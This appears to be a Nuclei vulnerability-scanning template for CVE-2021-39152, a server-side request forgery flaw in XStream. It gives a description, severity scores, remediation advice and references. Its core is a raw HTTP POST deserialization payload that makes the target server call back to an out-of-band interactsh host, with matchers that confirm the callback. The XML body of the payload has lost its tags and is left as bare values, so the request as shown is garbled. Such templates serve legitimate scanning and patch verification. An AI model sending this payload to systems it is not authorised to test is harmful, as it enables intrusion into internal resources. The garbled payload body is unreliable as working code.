id: CVE-2021-39152 info: name: XStream <1.4.18 - Server-Side Request Forgery author: pwnhxl severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: - https://x-stream.github.io/CVE-2021-39152.html - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2 - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/cve-2021-39152 - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.00668 epss-percentile: 0.77514 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve,cve2021,xstream,ssrf,oast http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml http://{{interactsh-url}}/internal/ GBK 1111 b 0 0 http://{{interactsh-url}}/internal/ 1111 b 0 0 matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # digest: 490a0046304402206549a629cc59ea5193e3b79d49b2857211331730d84467326afe3e15e32110770220630dfd557647ae0325fb7b46a63428c0c7e9b748802a2ada74f6cfb020929d94:922c64590222798bb761d5b6d8e72950